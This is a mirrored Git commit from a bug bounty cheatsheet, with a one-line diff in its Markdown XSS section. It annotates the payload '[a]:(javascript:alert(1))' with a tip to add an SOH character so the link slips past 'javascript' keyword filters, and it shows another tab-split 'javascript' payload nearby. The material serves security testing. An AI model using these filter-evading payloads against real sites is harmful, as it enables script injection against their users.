mirror of
https://github.com/EdOverflow/bugbounty-cheatsheet.git
synced 2024-11-21 18:53:01 +00:00
Added one payload in Markdown XSS
Sometimes we can't start with javascript keyword directly then, we need SOH(Start of Heading) Character.
This commit is contained in:
parent
0e8fcc7678
commit
d148279dee
1 changed files with 1 additions and 1 deletions
|
@ -119,7 +119,7 @@ javas	cript://www.google.com/%0Aalert(1)
|
|||
```
|
||||
|
||||
```md
|
||||
[a]:(javascript:alert(1))
|
||||
[a]:(javascript:alert(1)) //Add SOH Character
|
||||
```
|
||||
|
||||
|
||||
|
|
Loading…
Reference in a new issue